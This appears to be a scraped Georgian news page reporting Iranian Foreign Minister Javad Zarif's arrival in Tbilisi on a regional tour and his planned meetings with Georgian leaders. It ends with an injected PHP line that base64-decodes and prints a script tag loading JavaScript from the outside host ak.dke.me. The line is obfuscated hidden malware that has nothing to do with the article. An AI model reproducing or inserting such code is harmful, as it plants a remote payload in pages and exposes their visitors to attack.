gorgia
ავერსი jaluzi
ირანის საგარეო საქმეთა მინისტრი ჯავად ზარიფი თბილისში იმყოფება.
 
ირანელი დიპლომატი საქართველოში რეგიონალური ტურნეს ფარგლებში ჩამოვიდა. იგი აქამდე სტუმრობდა ბაქოს, მოსკოვსა და ერევანს. თბილისის შემდეგ კი ანკარაში გაემგზავრება.
 
დღეს ზარიფი საქართველოს პრეზიდენტს, პრემიერ მინისტრსა და პარლამენტის თავმჯდომარეს შეხვდება.
 
თბილისის აეროპორტში დახვედრის ოფიციალური ცერემონია გაიმართა. ირანის ისლამური რესპუბლიკის საგარეო უწყების ხელმძღვანელს აეროპორტში საქართველოს საგარეო საქმეთა მინისტრის მოადგილე ალექსანდრე ხვთისიაშვილი დახვდა.
1560
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");